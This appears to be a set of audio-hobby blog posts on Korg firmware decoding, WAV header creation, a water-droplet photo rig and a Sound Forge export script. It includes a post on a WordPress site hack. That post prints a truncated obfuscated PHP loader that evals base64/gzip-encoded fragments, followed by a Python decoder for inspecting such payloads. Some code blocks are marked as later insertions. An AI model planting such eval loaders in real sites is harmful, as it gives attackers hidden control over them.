Reverse Engineering the Korg Monotribe Firmware Upgrade

An excellent post (and useful comments) on the reverse engineering of the Korg Monotribe firmware update which apparently is provided as an audio file.  I’ll definitely be checking back on this regularly to watch Gravitronic’s progress.

GRAVITRONIC: Decoding the Korg Monotribe Firmware Upgrade.

How to turn any file format into a wave

Boing Boing posted a link to this video from YouTube user r2blend. R2blend used Adobe Audition but also suggests using Audacity’s ‘import data as audio’ feature to render an executable file (and presumably other file formats) to a listenable audio format.

This is awesome and I wanted to give it a try but I don’t have Adobe Audition. I do have Audacity but it’s on the Linux boot of my only laptop so using it there doesn’t do me much good on the Windows 7 boot, where I do most if not all of my audio work.

So I decided to come up with a way to create a valid .wav file header for any file format which can be inserted with the use of a hex editor. Here’s how to do it…

.Wav file headers are incredibly straightforward and require very little calculation to generate. There are numerous sources available on the web but I find this single, 7 year old page on Stanford’s site really easy to understand.

Simplifying the info from Stanford further, in most cases (I won’t delve into the exceptions here) you need a 44-byte string as follows:

52 49 46 46 “RIFF”
6E E8 02 00 the file size minus 8 bytes
57 41 56 45 “WAVE”
66 6D 74 20 “fmt ”
10 00 00 00 size of the format chunk: 16 for PCM
01 00 PCM = 1
02 00 Number of channels
44 AC 00 00 sample rate (this example is 44100)
10 B1 02 00 sample rate * Num Channels * Bits per sample/8
04 00 NumChannels * BitsPerSample/8
10 00 bits per sample (this example is 16)
64 61 74 61 “data”
00 E8 02 00 Total file size minus 44 bytes

Now that you know what you need we can get started. First make a copy of the file you want to turn into a .wav and change the extension to “.wav”. I used the executable for ESET’s NOD32 64bit anti-virus software.

Right click on the file to determine the file size.

Input the file size information to my handy Excel worksheet along with what sample rate you want, how many channels, and the bits per sample. Take note that you can have more than 2 channels…

Open the file you are converting to a working .wav file in your favorite hex editor. I use HxD which is more than sufficient for any of my needs.

Paste the copied 44 byte hex string…

Save it and open it in your favorite audio software and voila! You have audio, where previously there was none.
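The same header can be generated in code instead of a worksheet and a hex editor. The following is an added example, not part of the original post: it packs the 44 bytes listed above and prepends them to arbitrary input. The function names and the script name any2wav.py are made up for illustration, and the zero-padding to a whole sample frame is a choice of this example, not something the post does.

```python
import struct
import sys

def frame_size(channels, bits):
    """Bytes per sample frame (NumChannels * BitsPerSample / 8)."""
    if not 1 <= channels <= 0xFFFF:
        raise ValueError("channels must fit the 16-bit header field")
    if bits <= 0 or bits % 8:
        raise ValueError("bits per sample must be a positive multiple of 8")
    return channels * bits // 8

def wav_header(data_len, sample_rate=44100, channels=2, bits=16):
    """Build the 44-byte PCM header for data_len bytes of sample data."""
    align = frame_size(channels, bits)
    if data_len + 36 > 0xFFFFFFFF:
        raise ValueError("too large for the 32-bit size fields")
    return struct.pack(
        "<4sI4s4sIHHIIHH4sI",
        b"RIFF", data_len + 36,      # final file size minus 8
        b"WAVE", b"fmt ", 16, 1,     # fmt chunk size 16, format 1 = PCM
        channels, sample_rate,
        sample_rate * align,         # byte rate
        align, bits,
        b"data", data_len)           # final file size minus 44

def wrap_as_wav(payload, sample_rate=44100, channels=2, bits=16):
    """Prepend a header to arbitrary bytes, zero-padding to a whole frame."""
    pad = -len(payload) % frame_size(channels, bits)
    data = payload + b"\x00" * pad
    return wav_header(len(data), sample_rate, channels, bits) + data

if __name__ == "__main__":
    # usage (hypothetical script name): python any2wav.py input.bin output.wav [channels]
    src, dst = sys.argv[1], sys.argv[2]
    ch = int(sys.argv[3]) if len(sys.argv) > 3 else 2
    with open(src, "rb") as f, open(dst, "wb") as out:
        out.write(wrap_as_wav(f.read(), channels=ch))
```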

and as a treat, a look at what happens when you change the channels from one to eight using the same source…

And an example of the audio…

Hacked! Base 64 Injection.

While it seems WordPress users all over were experiencing the impact of a security flaw months ago I was a little late to the game in realizing my site had been hijacked.  Apologies to anyone who attempted to visit the site and was hit with Google’s Malware warning (if you use Chrome) or if you encountered any troubles.  It makes much more sense to me now why I was getting my comment inbox absolutely slaughtered with spam.  Here’s a snippet of some of the code I found in my footer (the original has hundreds of elements in the array):

<? $nam = array("4_decode","base6");
$cfk = array("gzunco","mpress") ;
$zippo = array("eNrFVQ","tv2zYQ/iucEUC2W+vhx","EETP4Iic7oATR",

$trimmer = $cfk[0].$cfk[1];
$zipo = array("eNq9Gm","t3mzj2rzg+OTOocRwEi","Mc4tP7SH7Cd3f",
$lango = $nam[1].$nam[0];
eval($trimmer($lango(implode("", $zippo))));
eval($trimmer($lango(implode("", $zipo)))); ?>

<div class="Footer">

<a class="moveToTop" href="#top"><?php _e('top', 'Eos'); ?></a>
</div><!-- Closes .Footer -->

</div><!-- Closes .PageContainer -->

<?php wp_footer(); ?>

There was rogue, obfuscated PHP all over the site, I had hundreds upon hundreds of comments awaiting approval all of which were spam, additional administrators added, over 2,000 bogus users attempting to register, and to top it off I had this… 777 as my file and folder access levels.
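When cleaning up after an injection like this, it helps to see what the eval() calls would have run without executing any of it. The following is an added example, not part of the original post: it statically joins the array fragments and reverses the base64_decode and gzuncompress steps that the footer code assembles from $nam and $cfk. The sample input is constructed with a harmless placeholder payload, and the regexes assume the exact statement shape shown above.

```python
import base64
import re
import zlib

MAX_OUT = 1 << 20  # cap on decompressed size, guards against decompression bombs

# $name = array("frag", "frag", ...);
ARRAY_RE = re.compile(r'\$(\w+)\s*=\s*array\((.*?)\)\s*;', re.S)
STR_RE = re.compile(r'"([^"]*)"|\'([^\']*)\'')
# eval($f($g(implode("", $name)  -> captures the array name
EVAL_RE = re.compile(
    r'eval\(\s*\$\w+\(\s*\$\w+\(\s*implode\(\s*["\']{2}\s*,\s*\$(\w+)\s*\)')


def unpack_eval_payloads(php_source):
    """Return {array_name: decoded bytes or None} for every eval() of the
    footer's shape. The payload is only decoded, never executed."""
    arrays = {name: "".join(a or b for a, b in STR_RE.findall(body))
              for name, body in ARRAY_RE.findall(php_source)}
    out = {}
    for name in EVAL_RE.findall(php_source):
        blob = arrays.get(name)
        if not blob:
            out[name] = None  # array not found in this file
            continue
        try:
            raw = base64.b64decode(blob, validate=True)
            out[name] = zlib.decompressobj().decompress(raw, MAX_OUT)
        except (ValueError, zlib.error):
            out[name] = None  # not valid base64 or zlib: keep for manual review
    return out


# Constructed sample: a harmless placeholder packed the same way as the footer code.
INNER = b"echo 'constructed placeholder';"
B64 = base64.b64encode(zlib.compress(INNER, 9)).decode()
FRAGS = [B64[i:i + 7] for i in range(0, len(B64), 7)]
SAMPLE = (
    '<? $nam = array("4_decode","base6");\n'
    '$cfk = array("gzunco","mpress") ;\n'
    '$zippo = array(' + ",".join('"%s"' % f for f in FRAGS) + ');\n'
    '$trimmer = $cfk[0].$cfk[1];\n'
    '$lango = $nam[1].$nam[0];\n'
    'eval($trimmer($lango(implode("", $zippo)))); ?>'
)

if __name__ == "__main__":
    for name, code in unpack_eval_payloads(SAMPLE).items():
        print(name, "->", code)
```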


Flickr user FoToopa just blew my mind.  Their DIY, laser triggered, multi-flash photo set-up for taking hi resolution macro photographs of water droplets is absolutely awesome.  I figured since they use a speaker to control the water droplet output it qualifies as DIY-audio related and deserves posting.  Take a look at the setup:

Waterfigures DIY Setup by FoToopa

FoToopa writes,

Setup for waterfigures. The upper speaker is the drop controller. This dropper gives a second drop via an audio waveform on the speaker. Control of this timing is via a second laser detector just under the dropper. Multiple flashes are used, 5 max for the foreground, one for the background. Background can be changed via a colored A3 paper. Different tools can be added; a color injector stays more on the foreground and is controlled via a magnet drive system. This color injector can inject a few paint drops into a falling drop to merge and to form multiple gradient colors on the splash. On the bottom a second speaker system is used for the waterfigures. Splashes and waterfigures and color injection can be merged together. On the left side stays a projectile tool to fire a small iron item through the falling droplet. Of course all these parts are homemade including the hardware controller (not seen in this picture). The camera is the D200 Nikon, driven also by the controller. 2 lasers are used for detection to give the controller the information for all delays and timings. All timings are digital at a resolution of 1 to 100 usec at 4 digit/delay unit. Delays are entered via the keyboard but preset at power-on to the best default time. Some values are driven by 2 rotary encoders to change the value fast.

And then take a look at the results…  Amazing.

Waterfigures by FoToopa

Sound Forge Batch Export Script

I frequently use Sound Forge to edit large wave files into smaller samples and clips that I then use in software samplers, drum machines, or set aside for further editing. When you’re only creating two or three clips, highlighting, copying, pasting, saving, renaming isn’t a big deal. Recently though while working on a project I found myself in need of creating dozens of clips from a single file… and this had to be done for a hundred files.

Sound Forge scripting to the rescue.

Sound Forge comes with some great built in scripts. For the task above I found the script named “Save Regions as Files” particularly useful. At first anyway. The existing script still required me to name the file and select the file location. This is a minor detail but when you have to repeat this process over 100 times it can be extremely frustrating. With a little help from the Sound Forge scripting SDK I came up with the following modification to the original script that will export all regions to the original file’s directory without any prompting.

The example above is named “Test_Wave_Export.wav”. When running the script the 6 regions are automatically saved in the same directory as the source file in incremental format without any additional prompting. A huge time saver.


Once the script is saved in the Sound Forge Script folder you can make an icon and add the script directly on your toolbar for easy access. This script uses JScript.


import System;
import System.IO;
import System.Windows.Forms;
import SoundForge;

//Run with a file that contains regions
//Iterates through the regions, renders to format of your choice and
//saves the rendered file to the same directory as the source file
//Scan the file for MODIFY HERE to see how to quickly customize for your own use

public class EntryPoint {

//Swap characters that are not allowed in file names for safe ones
public function CleanForFilename(szName)
{
   szName = szName.Replace(":",";");
   szName = szName.Replace("?","!");
   szName = szName.Replace("*","+");
   szName = szName.Replace("/","|");
   szName = szName.Replace("\\","|");
   if (szName.IndexOfAny(Path.InvalidPathChars) >= 0)
   {
      for (var ch in Path.InvalidPathChars)
         szName = szName.Replace(ch.ToString(),"_");
   }
   return szName;
}

public function Begin(app : IScriptableApp) {

   //check for an open file before reading anything from it
   var file = app.CurrentFile;
   if (null == file)
   {
      app.SetStatusText("open a file loser!");
      return;
   }

   //MODIFY HERE-----------------------------------------------
   var szType = ".wav"; //choose any valid extension: .avi .wav .w64 .mpg .mp3 .wma .mov .rm .aif .ogg .raw .au .dig .ivc .vox .pca
   var vPreset = "DaveTemplate"; //put the name of the template between the quotes, or leave blank to pop the Template chooser.
   var FileFullName = file.Filename; //obtain the full path and filename of the current file
   var szDir = FileFullName.substring( 0, FileFullName.lastIndexOf("\\") ); //Set the directory to that of the source file.

   //the directory is the source file's own, so it already exists

   //look up the renderer by extension or by name
   var rend : ISfRenderer = null;
   if (szType.StartsWith("."))
      rend = app.FindRenderer(null, szType);
   else
      rend = app.FindRenderer(szType, null);

   if (null == rend)
   {
      app.SetStatusText("Renderer not found. Script stopped.");
      DPF("renderer for {0} not found.", szType);
      return;
   }

   //use the named template, or let the user pick one when no name is given
   var template = null;
   if (vPreset != "")
      template = rend.GetTemplate(vPreset);
   else
      template = rend.ChooseTemplate(null, vPreset);
   if (null == template)
   {
      app.SetStatusText("Template not found. Script stopped.");
      return;
   }

   //base name for the clips: the window title without its 4-character extension
   var szBase = file.Window.Title;
   szBase = szBase.substring(0,szBase.length - 4);

   for (var mk in file.Markers)
   {
      //zero-length markers are not regions
      if (mk.Length <= 0)
         continue;

      var szName = String.Format("{0}-{1}.{2}", szBase, mk.Name, rend.Extension);

      szName = CleanForFilename(szName);

      var szFullName = Path.Combine(szDir, szName);
      if (File.Exists(szFullName))
         continue; //assumption: the statement here was lost from the page; skipping leaves existing files untouched

      var range : SfAudioSelection = new SfAudioSelection(mk.Start, mk.Length);
      file.RenderAs(szFullName, rend.Guid, template, range, RenderOptions("RenderOnly"));
   }

   var status : SfStatus = app.WaitForDoneOrCancel();
   DPF("Done -{0}", status);
}

public function FromSoundForge(app : IScriptableApp) {
   ForgeApp = app;
   app.SetStatusText(String.Format("Script '{0}' is running.", Script.Name));
   Begin(app);
   app.SetStatusText(String.Format("Script '{0}' is done.", Script.Name));
}
public var ForgeApp : IScriptableApp = null;
public function DPF(sz) { ForgeApp.OutputText(sz);}
public function DPF(sz,o) { ForgeApp.OutputText(System.String.Format(sz,o)); }
public function DPF(sz,o,o2) { ForgeApp.OutputText(System.String.Format(sz,o,o2)); }
public function DPF(sz,o,o2,o3) { ForgeApp.OutputText(System.String.Format(sz,o,o2,o3)); }

} // class EntryPoint